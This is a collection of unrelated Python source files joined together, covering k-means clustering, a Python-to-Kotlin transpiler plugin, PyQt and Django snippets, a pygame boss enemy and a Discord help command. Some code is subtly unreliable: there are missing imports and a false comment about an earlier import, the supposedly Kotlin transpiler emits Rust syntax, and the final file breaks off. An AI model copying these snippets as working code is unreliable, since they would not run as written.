import matplotlib.pyplot as plt
from copy import deepcopy
# Reading csv dataset as it does not have header, and separated by names
wine = pd.read_csv("wine.data", names = ["Class",
                                         "Alcohol",
                                         "Malic acid",
                                         "Ash",
                                         "Alcalinity of ash",
                                         "Magnesium",
                                         "Total phenols",
                                         "Flavanoids",
                                         "Nonflavanoid phenols",
                                         "Proanthocyanins",
                                         "Color intensity",
                                         "Hue",
                                         "OD280/OD315 of diluted wines",
                                         "Proline"])
# Shift class labels from 1..3 to 0..2.
wine.Class = wine.Class - 1
# K-means from scratch
# Use two features: column 12 ("OD280/OD315 of diluted wines") and
# column 1 ("Alcohol") as the 2-D clustering space.
X = wine.iloc[:, [12, 1]].values
data = pd.DataFrame(X)
val1 = data[0].values
val2 = data[1].values
# Euclidean Distance Function
def dist(x, y, ax=1):
    """Euclidean norm of (x - y) along axis *ax*.

    Passing ax=None reduces over every element (a single global norm).
    """
    difference = x - y
    return np.linalg.norm(difference, axis=ax)
# Number of clusters
k = 3
# Creating random centroids
# random x coordinates of centroids
x_coor = np.random.randint(0, np.max(X)-7, size=k)
# random y coordinates of random centroids
y_coor = np.random.randint(0, np.max(X)-7, size=k)
# Centroids
_centroid = np.array(list(zip(x_coor, y_coor)), dtype=np.float32)
print("Initial Centroids")
print(_centroid)
# Plotting actual values and the random centroids
plt.scatter(val1, val2, c='#050505', s=7)
plt.scatter(x_coor, y_coor, marker='x', s=200, c='g')
clusters = np.zeros(len(X))
# Lloyd's algorithm: iterate until the centroids stop moving.
# BUG FIX: the convergence error must compare the new centroids with the
# previous iteration's centroids (C_old).  The original compared against a
# never-updated all-zero array, so the loop could only terminate if the
# centroids themselves became zero — i.e. effectively never.
error = np.inf
while error != 0:
    # Assigning each value to its closest cluster
    for i in range(len(X)):
        distances = dist(X[i], _centroid)
        clusters[i] = np.argmin(distances)
    # Storing the old centroid values
    C_old = deepcopy(_centroid)
    # Finding the new centroids by taking the average value
    for i in range(k):
        points = [X[j] for j in range(len(X)) if clusters[j] == i]
        # Keep the old centroid when a cluster is empty (np.mean([]) is NaN).
        if points:
            _centroid[i] = np.mean(points, axis=0)
    error = dist(_centroid, C_old, None)
colors = ['red','blue','green']
fig, ax = plt.subplots()
for i in range(k):
    points = np.array([X[j] for j in range(len(X)) if clusters[j] == i])
    ax.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])
ax.scatter(_centroid[:, 0], _centroid[:, 1], marker='*', s=200, c='#050505')
# K means with scikit-learn libraries
# (KMeans is already imported at the top of the file; this re-import is
# redundant but harmless.)
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=3)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
# Color each point by its predicted cluster, then overlay the centers.
plt.scatter(X[:, 0], X[:, 1], c=y_kmeans, s=50, cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5);
|
import io
import os
import ast
import functools
import re
import sys
import textwrap
from tempfile import NamedTemporaryFile
from typing import Callable, Dict, List, Tuple, Union
try:
    from argparse_dataclass import dataclass as ap_dataclass
    from argparse_dataclass import ArgumentParser
except ImportError:
    # argparse_dataclass is optional.  Fall back to sentinel strings so the
    # dispatch tables below still have hashable placeholder keys.
    # (BUG FIX: the original bare `except:` also swallowed unrelated errors
    # such as KeyboardInterrupt and genuine import-time failures.)
    ArgumentParser = "ArgumentParser"
    ap_dataclass = "ap_dataclass"
class KotlinTranspilerPlugins:
    """Per-construct code-generation plugins used by the Kotlin transpiler.

    Each ``visit_*`` method receives the AST node being translated plus the
    already-visited argument strings (``vargs``) and returns a Kotlin source
    fragment, or None when the construct cannot be translated.
    """

    def visit_argparse_dataclass(self, node):
        """Emit a StructOpt-style declaration for an argparse dataclass.

        NOTE(review): the generated text is Rust/structopt syntax, not
        Kotlin — it looks inherited from a sibling transpiler; confirm.
        Returns None when any field lacks a resolvable type.
        """
        fields = []
        for (
            declaration,
            typename_with_default,
        ) in node.declarations_with_defaults.items():
            typename, default_value = typename_with_default
            if typename is None:
                # Unresolvable field type: give up on the whole class.
                return None
            if default_value is not None and typename != "bool":
                default_value = self.visit(default_value)
                default_value = f', default_value = "{default_value}"'
            else:
                default_value = ""
            fields.append(
                f"#[structopt(short, long{default_value})]\npub {declaration}: {typename},"
            )
        fields = "\n".join(fields)
        self._usings.add("structopt::StructOpt")
        # Keep the template at column 0 so textwrap.dedent leaves the output
        # unchanged regardless of what `fields` contains.
        clsdef = "\n" + textwrap.dedent(
            f"""\
#[derive(Debug, StructOpt)]
#[structopt(name = "{self._module}", about = "Placeholder")]
struct {node.name} {{
{fields}
}}
"""
        )
        return clsdef

    def visit_open(self, node, vargs):
        """Translate open(path[, mode]) into File::open / OpenOptions chains."""
        self._usings.add("std::fs::File")
        if len(vargs) > 1:
            self._usings.add("std::fs::OpenOptions")
            mode = vargs[1]
            opts = "OpenOptions::new()"
            is_binary = "b" in mode
            for c in mode:
                if c == "w":
                    if not is_binary:
                        self._usings.add("pylib::FileWriteString")
                    opts += ".write(true)"
                if c == "r":
                    if not is_binary:
                        self._usings.add("pylib::FileReadString")
                    opts += ".read(true)"
                if c == "a":
                    opts += ".append(true)"
                if c == "+":
                    opts += ".read(true).write(true)"
            node.result_type = True
            return f"{opts}.open({vargs[0]})"
        node.result_type = True
        return f"File::open({vargs[0]})"

    def visit_named_temp_file(self, node, vargs):
        """Translate tempfile.NamedTemporaryFile() to NamedTempFile::new()."""
        node.annotation = ast.Name(id="tempfile._TemporaryFileWrapper")
        node.result_type = True
        return "NamedTempFile::new()"

    def visit_textio_read(self, node, vargs):
        """Not implemented yet; returning None skips the dispatch."""
        # TODO
        return None

    def visit_textio_write(self, node, vargs):
        """Not implemented yet; returning None skips the dispatch."""
        # TODO
        return None

    def visit_ap_dataclass(self, cls):
        # Do whatever transformation the decorator does to cls here
        return cls

    def visit_range(self, node, vargs: List[str]) -> str:
        """Translate range(...) to a Kotlin range expression.

        Kotlin's ``..`` is inclusive, hence the emitted ``-1`` on the upper
        bound.  NOTE(review): negative steps would need ``downTo`` — the
        ``step`` form below assumes a positive step.
        """
        if len(node.args) == 1:
            return "(0..{}-1)".format(vargs[0])
        elif len(node.args) == 2:
            return "({}..{}-1)".format(vargs[0], vargs[1])
        elif len(node.args) == 3:
            return "({}..{}-1 step {})".format(vargs[0], vargs[1], vargs[2])
        raise Exception(
            "encountered range() call with unknown parameters: range({})".format(vargs)
        )

    def visit_print(self, node, vargs: List[str]) -> str:
        """Translate print(...) into a Kotlin println with $-interpolation."""
        def _format(arg):
            # Numeric literals and quoted strings are embedded verbatim;
            # everything else becomes a template interpolation.
            if arg.isdigit():
                return arg
            if re.match(r"'.*'", arg) or re.match(r'".*"', arg):
                return arg[1:-1]
            else:
                return f"${arg}"
        vargs_str = " ".join([f"{_format(arg)}" for arg in vargs])
        return f'println("{vargs_str}")'

    def visit_min_max(self, node, vargs, is_max: bool) -> str:
        """Translate min()/max() to kotlin.math.min/max or minOf/maxOf."""
        min_max = "max" if is_max else "min"
        self._usings.add(f"kotlin.math.{min_max}")
        self._typename_from_annotation(node.args[0])
        if hasattr(node.args[0], "container_type"):
            # BUG FIX: honour is_max here; the original always emitted
            # maxOf, so min() over a container silently became a max().
            return f"{min_max}Of({vargs[0]})"
        else:
            all_vargs = ", ".join(vargs)
            return f"{min_max}({all_vargs})"

    @staticmethod
    def visit_cast(node, vargs, cast_to: str) -> str:
        """Emit a .toX() conversion; with no arguments, the type's zero value.

        BUG FIX: the original returned a default only for Double and then
        fell through to vargs[0], raising IndexError for other empty casts.
        """
        if not vargs:
            return "0.0" if cast_to == "Double" else "0"
        return f"{vargs[0]}.to{cast_to}()"

    def visit_floor(self, node, vargs) -> str:
        """Translate math.floor(x) to floor(x).toInt()."""
        self._usings.add("kotlin.math.floor")
        return f"floor({vargs[0]}).toInt()"
# small one liners are inlined here as lambdas
SMALL_DISPATCH_MAP = {
    "str": lambda n, vargs: f"{vargs[0]}.toString()" if vargs else '""',
    # TODO: strings use .length
    "len": lambda n, vargs: f"{vargs[0]}.size",
    "int": lambda n, vargs: f"{vargs[0]}.toInt()" if vargs else "0",
    "float": functools.partial(KotlinTranspilerPlugins.visit_cast, cast_to="Double"),
    "bool": lambda n, vargs: f"({vargs[0]} != 0)" if vargs else "false",
    "reversed": lambda n, vargs: f"{vargs[0]}.reversed()",
}
SMALL_USINGS_MAP: Dict[str, str] = {}
# Builtins whose translation needs node context (implemented as methods).
DISPATCH_MAP = {
    "max": functools.partial(KotlinTranspilerPlugins.visit_min_max, is_max=True),
    "min": functools.partial(KotlinTranspilerPlugins.visit_min_max, is_max=False),
    "range": KotlinTranspilerPlugins.visit_range,
    "xrange": KotlinTranspilerPlugins.visit_range,
    "print": KotlinTranspilerPlugins.visit_print,
    "floor": KotlinTranspilerPlugins.visit_floor,
}
MODULE_DISPATCH_TABLE: Dict[str, str] = {}
DECORATOR_DISPATCH_TABLE = {ap_dataclass: KotlinTranspilerPlugins.visit_ap_dataclass}
CLASS_DISPATCH_TABLE = {ap_dataclass: KotlinTranspilerPlugins.visit_argparse_dataclass}
ATTR_DISPATCH_TABLE = {
    "temp_file.name": lambda self, node, value, attr: f"{value}.path()",
}
FuncType = Union[Callable, str]
FUNC_DISPATCH_TABLE: Dict[FuncType, Tuple[Callable, bool]] = {
    # Uncomment after upstream uploads a new version
    # ArgumentParser.parse_args: lambda node: "Opts::parse_args()",
    # HACKs: remove all string based dispatch here, once we replace them with type based
    "parse_args": (lambda self, node, vargs: "::from_args()", False),
    "f.read": (lambda self, node, vargs: "f.read_string()", True),
    "f.write": (lambda self, node, vargs: f"f.write_string({vargs[0]})", True),
    "f.close": (lambda self, node, vargs: "drop(f)", False),
    open: (KotlinTranspilerPlugins.visit_open, True),
    NamedTemporaryFile: (KotlinTranspilerPlugins.visit_named_temp_file, True),
    io.TextIOWrapper.read: (KotlinTranspilerPlugins.visit_textio_read, True),
    # BUG FIX: the write handler must be keyed on .write; the original
    # repeated the .read key, which silently replaced (dropped) the read
    # handler because later duplicate dict keys win.
    io.TextIOWrapper.write: (KotlinTranspilerPlugins.visit_textio_write, True),
    os.unlink: (lambda self, node, vargs: f"std::fs::remove_file({vargs[0]})", True),
    sys.exit: (
        lambda self, node, vargs: f"kotlin.system.exitProcess({vargs[0]})",
        True,
    ),
}
|
import json
# Read parameter file
# Read parameter file
with open('service/parameters.json', 'r') as f:
    parameters = json.load(f)
# Tolerance is equals to 1 - similarity threshold
parameters['tolerance'] = 1 - float(parameters['sim_threshold'])
# Fixed embedding-vector length used downstream.
parameters['FEATURE_DIMENSION'] = 128
# -*- coding: utf-8 -*-
from datetime import datetime
from pathlib import Path
from typing import List, Any
from PyQt5.QtWidgets import QFormLayout, QLineEdit, QDateTimeEdit, QWidget
from PyQt5.QtWidgets import QDialog
from dgp.core.oid import OID
from dgp.core.controllers.controller_interfaces import IAirborneController
from .dialog_mixins import FormValidator
from ..ui.project_properties_dialog import Ui_ProjectPropertiesDialog
class ProjectPropertiesDialog(QDialog, Ui_ProjectPropertiesDialog, FormValidator):
    """Dialog for viewing and editing an airborne project's properties.

    Editor widgets are generated from the project's fields; values from
    writeable fields are written back via ``set_attr`` on accept.
    """

    def __init__(self, project: IAirborneController, parent=None):
        super().__init__(parent=parent)
        self.setupUi(self)
        self._project = project
        self.setWindowTitle(self._project.get_attr('name'))
        # field key -> (declared type, editor widget), writeable fields only
        self._updates = {}
        # value type -> (to-display-string converter, widget class)
        self._field_map = {
            str: (lambda v: v.strip(), QLineEdit),
            Path: (lambda v: str(v.resolve()), QLineEdit),
            datetime: (lambda v: v, QDateTimeEdit),
            OID: (lambda v: v.base_uuid, QLineEdit)
        }
        self._setup_properties_tab()

    def _get_field_attr(self, _type: Any):
        """Return (converter, widget class) for *_type*.

        Exact type match first, then subclass relationships; None when
        the type is not mapped at all.
        """
        try:
            attrs = self._field_map[_type]
        except KeyError:
            for key in self._field_map.keys():
                if issubclass(_type, key):
                    return self._field_map[key]
            return None
        return attrs

    def _setup_properties_tab(self):
        """Build one form row per project field."""
        for key in self._project.fields:
            enabled = self._project.writeable(key)
            validator = self._project.validator(key)
            raw_value = self._project.get_attr(key)
            data_type = type(raw_value)
            # NOTE(review): _get_field_attr may return None for unmapped
            # types, which would raise TypeError on unpacking — confirm all
            # project field types are covered by _field_map.
            value_lambda, widget_type = self._get_field_attr(data_type)
            widget: QWidget = widget_type(value_lambda(raw_value))
            widget.setEnabled(enabled)
            if validator:
                widget.setValidator(validator)
            self.qfl_properties.addRow(str(key.strip('_')).capitalize(), widget)
            if enabled:
                self._updates[key] = data_type, widget

    @property
    def validation_targets(self) -> List[QFormLayout]:
        # Layouts scanned by FormValidator.validate()
        return [self.qfl_properties]

    @property
    def validation_error(self):
        # Label used to surface validation messages
        return self.ql_validation_err

    def accept(self):
        """Validate the form, then write edited values back to the project.

        BUG FIX: validation now runs *before* the set_attr loop.  The
        original applied every edit first and only then checked validity,
        so invalid values were still persisted to the project.
        """
        if not self.validate():
            print("A value is invalid")
            return
        print("Updating values for fields:")
        for key in self._updates:
            print(key)
            try:
                self._project.set_attr(key, self._updates[key][1].text())
            except AttributeError:
                print("Can't update key: {}".format(key))
        super().accept()
|
from django.contrib import admin
from Home.models import Workers, Employer
# Register your models here.
# Expose both Home models in the Django admin with the default ModelAdmin.
admin.site.register(Workers)
admin.site.register(Employer)
|
# _*_ coding:utf-8 _*_
from __future__ import unicode_literals
from django.apps import AppConfig
class CompanysConfig(AppConfig):
    """Django app configuration for the 'companys' app."""
    name = 'companys'
    # Human-readable app name shown in the admin ("enterprise" in Chinese).
    verbose_name = u'企业'
|
import numpy as np
class Distribution(object):
    '''
    Base class for distribution. Useful for estimating and sampling
    initial state distributions
    '''

    def fit(self, data):
        """Estimate distribution parameters from *data*.

        BUG FIX: the original signature omitted ``self``, so calling
        ``instance.fit(data)`` raised TypeError (extra argument) instead
        of reaching the intended NotImplementedError.
        """
        raise NotImplementedError

    def sample(self, n_samples=1):
        """Draw *n_samples* samples; implemented by subclasses."""
        raise NotImplementedError

    @property
    def dim(self):
        # Dimensionality of the distribution's support.
        return self.__dim

    @dim.setter
    def dim(self, dim):
        self.__dim = dim
class Delta(Distribution):
    """Degenerate (point-mass) distribution: every sample equals ``a``."""
    def __init__(self, a):
        self.a = a
    def sample(self, n_samples=1):
        # One copy of ``a`` per requested sample, stacked as rows.
        return np.tile(self.a, (n_samples, 1))
class Gaussian(Distribution):
    """Multivariate Gaussian N(mean, cov), sampled via the Cholesky factor."""

    def __init__(self, mean, cov):
        self.mean = np.array(mean)
        self.cov = np.array(cov)  # the setter also computes the Cholesky factor
        self.dim = self.mean.size

    @property
    def cov(self):
        return self.__cov

    @cov.setter
    def cov(self, cov):
        self.__cov = cov
        if cov is not None:
            assert cov.shape[0] == cov.shape[1]
            # Lower-triangular L with cov = L @ L.T
            self.cov_chol = np.linalg.cholesky(cov)

    def sample(self, n_samples=1):
        """Draw samples as mean + z @ L.T, giving Cov = L L^T = cov.

        BUG FIX: the original used ``z.dot(L)`` (no transpose), which
        produces samples with covariance L^T L rather than the requested
        cov = L L^T.
        """
        return self.mean + np.random.randn(
            n_samples, self.mean.size).dot(self.cov_chol.T)

    def __call__(self, mean=None, cov=None, n_samples=1):
        """Optionally update mean/cov, then sample."""
        if mean is not None:
            self.mean = mean
        if cov is not None:
            self.cov = cov
        return self.sample(n_samples)
|
"""
este eh um client, para funcionar deve rodar:
python api-server-get.py runserver [enter]
"""
import requests
endpoint = "http://127.0.0.1:5000"
rq = requests.get(endpoint)
print("status-code:")
print(rq.status_code)
print("headers:")
print(rq.headers['content-type'])
print("text:")
print(rq.text)
print("json:")
print(rq.json()) |
""" Keep subpath handling consistent.
As files should not be written outside of CWD, this is a security issue.
Paths may be provided as absolute or relative, and they may be manipulated
inside the storage files. So the check should happen every time a path is
actually used.
"""
import os
import pathlib
from typing import TypeVar
AnyPath = TypeVar("AnyPath", str, pathlib.Path)
class SubPath:
    """A path constrained to be relative and free of '..' components.

    Guards against reading or writing files outside the intended parent
    directory (see module docstring).
    """

    def __init__(self, relative_path: "AnyPath"):
        """ Wrapper for pathlib.Path that only allows relative paths without .. elements. """
        self.relative_path = self.to_path(relative_path)
        if self.relative_path.is_absolute():
            raise ValueError("only relative paths allowed here! (%s)" % relative_path)
        if '..' in self.relative_path.parts:
            raise ValueError("'..' not allowed in SubPath! (%s)" % relative_path)

    def __str__(self) -> str:
        """ relative string representation. """
        return str(self.relative_path)

    @staticmethod
    def to_path(path: "AnyPath") -> pathlib.Path:
        """ Pure conversion of string or Path to Path. """
        # BUGFIX: removed stray debug print(path) left over from development.
        if not isinstance(path, pathlib.Path):
            return pathlib.Path(path)
        return path

    def absolute_path(self, parent: "AnyPath") -> pathlib.Path:
        """ Transform to absolute: parent joined with this relative path. """
        return self.to_path(parent) / self.relative_path

    @classmethod
    def from_any_path(cls, path: "AnyPath", parent: "AnyPath") -> "SubPath":
        """ Create from absolute or relative path.

        Raises ValueError if *path* does not lie under *parent*.
        """
        abs_path = cls.to_path(os.path.abspath(path))
        abs_parent = cls.to_path(os.path.abspath(parent))
        return cls(abs_path.relative_to(abs_parent))

    @property
    def slashed_string(self) -> str:
        """ '/'-separated string representation.
        Intended for platform-independent storage.
        """
        return '/'.join(self.relative_path.parts)
|
import random
def randint(a, b):
    """Thin passthrough to random.randint: uniform integer in [a, b]."""
    return random.randint(a, b)
def dmg(STR, DEF):
    """Damage roll: a random 80-120% of STR, reduced by 50% of DEF, floored at 0."""
    roll = random.randint(80, 120)
    raw = (roll * STR - DEF * 50) / 100
    return raw if raw > 0 else 0
|
# Brute-force approaches for the maximum subarray problem
def maxSubOn3(arr):
    """O(n^3) brute force maximum-subarray sum.

    Returns 0 for an empty or all-negative array (the empty subarray counts).

    BUGFIX: previously relied on a module-level global ``n`` instead of
    ``len(arr)``, and the inner sum ``range(i, j)`` excluded ``arr[j]``, so
    subarrays ending at the last index were never considered.
    """
    n = len(arr)
    maximum = 0
    for i in range(n):
        for j in range(i, n):
            subsum = 0
            for k in range(i, j + 1):  # include arr[j]
                subsum += arr[k]
            maximum = max(subsum, maximum)
    return maximum
def maxSubOn2(arr):
    """O(n^2) maximum-subarray sum via running prefix sums.

    Returns 0 for an empty or all-negative array (the empty subarray counts).

    BUGFIX: previously relied on a module-level global ``n`` instead of
    ``len(arr)``, so the function broke when called from other modules.
    """
    n = len(arr)
    maximum = 0
    for i in range(n):
        subsum = 0
        for j in range(i, n):
            subsum += arr[j]  # subsum is now sum(arr[i..j])
            maximum = max(maximum, subsum)
    return maximum
if __name__ == '__main__':
    # Read the array interactively, then run the chosen brute-force variant.
    n = int(input("Enter the size of array:- "))
    intArray = []
    print("Enter Element of integer list ")
    for i in range(n):
        ele = int(input())
        intArray.append(ele)
    option = input("Enter on2 for O(n^2) and on3 for O(n^3) time complexity Subarray:- ")
    if option == 'on2':
        maxsum = maxSubOn2(intArray)
    elif option == 'on3':
        maxsum = maxSubOn3(intArray)
    else:
        # BUGFIX: an unrecognized option previously crashed with a NameError
        # on maxsum at the print below.
        raise SystemExit("Unknown option: {!r} (expected 'on2' or 'on3')".format(option))
    print("maximum sum of Subarray is {}".format(maxsum))
|
from Character import Character
from Sprite import AnimatedSprite
from Text import Text
from Player import HPDisplay
import random, pygame
class Spiderboss(Character):
    """Boss enemy: a giant spider with repell, smash and eye-laser attacks.

    State machine values: "idle" (count down, then pick an action), "move"
    (walk toward __dest), "repell" (knock the player back), "smash" (melee),
    "eye_attack" (fire the laser).
    """

    def __init__(self, level):
        Character.__init__(self, "spiderboss", level)
        self.laser = Laser(self, level.get_camera())
        self.level = level
        self.wait_ticks = 0        # frames spent idling before the next action
        self.state = "idle"
        self.HPDisplay = HPDisplay(self, level, offset=[15, 187], color=(255, 220, 220))
        self.lock_control = False  # when True, logic() does nothing

    def load_resources(self):
        Character.load_resources(self)
        self.set_speed(1)
        self.change_state("idle")
        self.change_direction("front")
        self.walk_area = self.get_level().get_tile_map().bossarea
        self.player = self.get_level().get_player_list()[0]
        self.set_speed(15)
        self.player_hitted = False
        self.walk_to()
        # Body hitboxes (local pixel rects), lower body first.
        self.add_hitbox(pygame.Rect((96, 228), (151, 23)))
        self.add_hitbox(pygame.Rect((63, 197), (218, 33)))
        self.add_hitbox(pygame.Rect((44, 164), (253, 33)))
        # Legs
        self.add_hitbox(pygame.Rect((297, 234), (19, 48)))
        self.add_hitbox(pygame.Rect((9, 234), (21, 49)))
        # Upper body
        self.add_hitbox(pygame.Rect((38, 84), (265, 81)))
        self.set_unbockable(True)
        self.dead = False

    def logic(self):
        """Per-frame state-machine update; see class docstring for the states."""
        Character.logic(self)
        if self.lock_control: return
        if self.get_hp() <= 0:
            # Death sequence: play "death" once, then hold "deathidle".
            self.change_animstate("death")
            self.shooting = False  # NOTE(review): the laser owns `shooting`; setting it on the boss looks unused
            if self.get_actual_frame() == 15:
                self.dead = True
            if self.dead:
                self.change_animstate("deathidle")
            return
        if self.state == "repell":
            self.change_animstate("repell")
            if self.get_actual_frame() == self.get_total_frames() - 1:
                self.state = "idle"
        if self.state == "smash":
            self.change_animstate("smash_attack")
            if self.get_actual_frame() >= 3:
                self.player_hitted = True
            if not self.player_hitted:
                r = pygame.Rect(self.get_coord()[0], self.get_coord()[1], self.get_rect()[2], self.get_rect()[3])
                if self.player.test_collide(r):
                    self.player.deal_damage(0.2)
            if self.get_actual_frame() == 11:
                self.player_hitted = False
                self.state = "idle"
        if self.state == "idle":
            self.change_state("idle")
            self.wait_ticks += 1
            if self.wait_ticks == 120:
                print("Reached")
                self.wait_ticks = 0
                c = pygame.Rect((0, 0), (0, 0))
                c.x = self.player.get_coord()[0]
                c.y = self.player.get_coord()[1]
                c.width = self.player.get_rect().width
                c.height = self.player.get_rect().height
                if self.test_collide(c):
                    # Player is touching the boss: knock them away from the body center.
                    self.state = "repell"
                    if self.player.get_coord()[0] < self.get_coord()[0] + self.get_rect().width / 2:
                        self.player.repell(500, "left")
                    else:
                        self.player.repell(500, "right")
                    self.player.deal_damage(0.21)
                else:
                    # BUGFIX: was `self.change_state == "move"` — a no-op
                    # comparison instead of a method call.
                    self.change_state("move")
                    self.walk_to()
        if self.state == "eye_attack":
            self.change_animstate("eye_attack")
            self.laser.logic()
            if not self.player_hitted and self.laser.dealing_damage and self.laser.shooting:
                for hb in self.laser.get_damage_area():
                    print(self.player.test_collide(hb))
                    if self.player.test_collide(hb):
                        self.player.deal_damage(0.3)
                        self.player_hitted = True
            if self.get_actual_frame() == 11:
                self.laser.shoot()
            if self.get_actual_frame() == self.get_total_frames() - 1:
                self.player_hitted = False
                self.state = "idle"
        if self.state == "move":
            c = pygame.Rect((0, 0), (0, 0))
            c.x = self.player.get_coord()[0]
            c.y = self.player.get_coord()[1]
            c.width = self.player.get_rect().width
            c.height = self.player.get_rect().height
            if self.test_collide(c):
                self.state = "repell"
                if self.player.get_coord()[0] < self.get_coord()[0] + self.get_rect().width / 2:
                    self.player.repell(500, "left")
                else:
                    self.player.repell(500, "right")
                self.player.deal_damage(0.21)
            # Step one axis at a time toward __dest, checking arrival after each step.
            if self.get_coord()[0] < self.__dest[0]:
                self.walk("right")
                self.arrived()
            if self.get_coord()[1] < self.__dest[1]:
                self.walk("down")
                self.arrived()
            if self.get_coord()[0] > self.__dest[0]:
                self.walk("left")
                self.arrived()
            if self.get_coord()[1] > self.__dest[1]:
                self.walk("up")
                self.arrived()

    def arrived(self):
        """Switch to the eye attack once the boss is within a 50px square of __dest."""
        if (self.get_coord()[0] >= self.__dest[0] and self.get_coord()[0] <= self.__dest[0] + 50) and (self.get_coord()[1] >= self.__dest[1] and self.get_coord()[1] <= self.__dest[1] + 50):
            self.state = "eye_attack"
            self.wait_ticks += 0  # NOTE(review): no-op — probably meant `= 0`; left as-is
            print("Changing")

    def draw(self, screen):
        Character.draw(self, screen)
        self.laser.draw(screen)
        self.HPDisplay.draw(screen)

    def walk_to(self, c=None):
        """Pick a destination: explicit c, or a random point inside the boss
        area (preferring the player's x position when it is inside the area)."""
        if c:
            self.__dest = c
            self.state = "walk"
            return
        a = self.walk_area
        b = self.player.get_coord()[0] - self.get_rect()[2] / 2 - 40
        print("")
        print("Bossarea")
        print(a[0] + a[2])
        print("Player")
        print(b)
        print("")
        if b >= a[0] and b <= a[0] + a[2]:
            print("Target player")
            self.__dest = [b, random.randint(a[1], a[1] + a[3])]
        else:
            self.__dest = [random.randint(a[0], a[0] + a[2]), random.randint(a[1], a[1] + a[3])]
        self.state = "move"
class Laser():
    """Eye-laser beam owned by the Spiderboss (passed in as `font`)."""

    def __init__(self, font, camera):
        self.font = font  # owning Spiderboss; used as the position source
        self.laser = AnimatedSprite.load_data("spiderlaser", camera)["shoot"]
        self.shooting = False        # True while the shoot animation plays
        self.dealing_damage = False  # True during animation frames 0..7
        # Per-segment beam hitboxes; repositioned in get_damage_area().
        self.hba = pygame.Rect((0, 0), (0,0))
        self.hbb = pygame.Rect((0, 0), (0,0))
        self.hbc = pygame.Rect((0, 0), (0,0))
        self.hbd = pygame.Rect((0, 0), (0,0))
        self.hbe = pygame.Rect((0, 0), (0,0))
        self.hbf = pygame.Rect((0, 0), (0,0))
        self.hbg = pygame.Rect((0, 0), (0,0))
        self.hbh = pygame.Rect((0, 0), (0,0))  # NOTE(review): never repositioned — see get_damage_area()

    def shoot(self):
        # Restart the shoot animation from its first frame.
        self.shooting = True
        self.laser.set_actual_frame(0)

    def logic(self):
        self.laser.logic()
        self.p = [0, 0 ]
        if self.laser.get_actual_frame() == self.laser.get_total_frames() - 1:
            self.shooting = False
        # Damage window covers frames 0..7 of the shoot animation.
        if self.laser.get_actual_frame() >= 0 and self.laser.get_actual_frame() <= 7:
            self.dealing_damage = True
        else:
            self.dealing_damage = False

    def get_damage_area(self):
        """Recompute and return the beam hitboxes, boss-relative.

        NOTE(review): implicitly returns None when not shooting/dealing damage
        (callers currently guard on those flags first), and hbh is appended but
        never repositioned — it stays a zero-size rect at the origin. Both look
        unintended; confirm against callers before changing.
        """
        if self.shooting and self.dealing_damage:
            r = self.laser.get_rect()
            # Beam origin: boss position shifted to where the eye sprite sits.
            c = [0, 0, 0, 0]
            c[0] = self.font.get_coord()[0] - 5
            c[1] = self.font.get_coord()[1] + 190
            c[2] = r[2]
            c[3] = r[3]
            hitboxes = []
            self.hba = pygame.Rect((c[0] + 30, c[1] + 628), (279, 171))
            self.hbb = pygame.Rect((c[0] + 66, c[1] + 482), (211, 147))
            self.hbc = pygame.Rect((c[0] + 90, c[1] + 370), (166, 110))
            self.hbd = pygame.Rect((c[0] + 109, c[1] + 276), (128, 95))
            self.hbe = pygame.Rect((c[0] + 126, c[1] + 181), (92, 101))
            self.hbf = pygame.Rect((c[0] + 143, c[1] + 113), (62, 73))
            self.hbg = pygame.Rect((c[0] + 155, c[1] + 55), (38, 64))
            hitboxes.append(self.hba)
            hitboxes.append(self.hbb)
            hitboxes.append(self.hbc)
            hitboxes.append(self.hbd)
            hitboxes.append(self.hbe)
            hitboxes.append(self.hbf)
            hitboxes.append(self.hbg)
            hitboxes.append(self.hbh)
            return hitboxes

    def draw(self, screen):
        if self.shooting:
            # Draw the beam at the boss position with the same offsets used
            # for the hitboxes above.
            c = self.font.get_coord()
            self.p = [0, 0]
            self.p[0] = c[0]
            self.p[1] = c[1]
            self.p[0] -= 5
            self.p[1] += 190
            self.laser.draw(self.p, screen, False)
            # pygame.draw.rect(screen, (255,255,255), self.hba)
            # pygame.draw.rect(screen, (255,255,255), self.hbb)
            # pygame.draw.rect(screen, (255,255,255), self.hbc)
            # pygame.draw.rect(screen, (255,255,255), self.hbd)
            # pygame.draw.rect(screen, (255,255,255), self.hbe)
            # pygame.draw.rect(screen, (255,255,255), self.hbf)
            # pygame.draw.rect(screen, (255,255,255), self.hbg)
            # pygame.draw.rect(screen, (255,255,255), self.hbh)
|
import discord
from configs.configs import Configs
# Command names and cosmetics, all pulled from the bot configuration.
PREFIX = Configs.prefijoBot
COMANDO_ADD = Configs.comandoAdd
COMANDO_REMOVE = Configs.comandoRemove
COMANDO_NEXT = Configs.comandoNext
COMANDO_DELETE = Configs.comandoDelete
COMANDO_LIST = Configs.comandoList
COMANDO_ALL = Configs.comandoAll
COMANDO_CREATE = Configs.comandoCreate
imagenThumbnail = Configs.imagenThumbnail
emojis = Configs.emojis
# Description: Mostrar mensaje de ayuda
# Access: Everyone
async def manejarComandoHelp(channel):
    """Send the embedded help message to the given channel; always returns True."""
    await channel.send(embed=generarMensajeEmbedHelp())
    return True
def generarMensajeEmbedHelp():
    """Build the help embed: student commands, assistant commands, emoji legend."""
    # Creacion de mensaje embed
    mensajeEmbed = discord.Embed(title="Lista de comandos:",
                                 color=discord.Color.purple())
    mensajeEmbed.set_thumbnail(url=imagenThumbnail)
    mensajeEmbed.add_field(name="Comandos para Alumnos:",
                           value=f'''
{PREFIX} {COMANDO_ADD} unaCola | Agregarse a una cola
{PREFIX} {COMANDO_REMOVE} unaCola | Quitarse de una cola
''',
                           inline=False)
    mensajeEmbed.add_field(name="Comandos para Ayudantes:",
                           value=f'''
{PREFIX} {COMANDO_CREATE} unaCola | Crear una nueva cola
{PREFIX} {COMANDO_DELETE} unaCola | Eliminar una cola
{PREFIX} {COMANDO_NEXT} unaCola | Atender el siguiente en una cola
{PREFIX} {COMANDO_LIST} unaCola | Mostrar estado de la cola
{PREFIX} {COMANDO_ALL} | Mostrar todas las colas existentes
''',
                           inline=False)
    mensajeEmbed.add_field(
        name="Emojis:",
        value=f"[{emojis[0]}] add | [{emojis[1]}] remove | [{emojis[2]}] next | [{emojis[3]}] delete",
        inline=False)
    mensajeEmbed.set_footer(
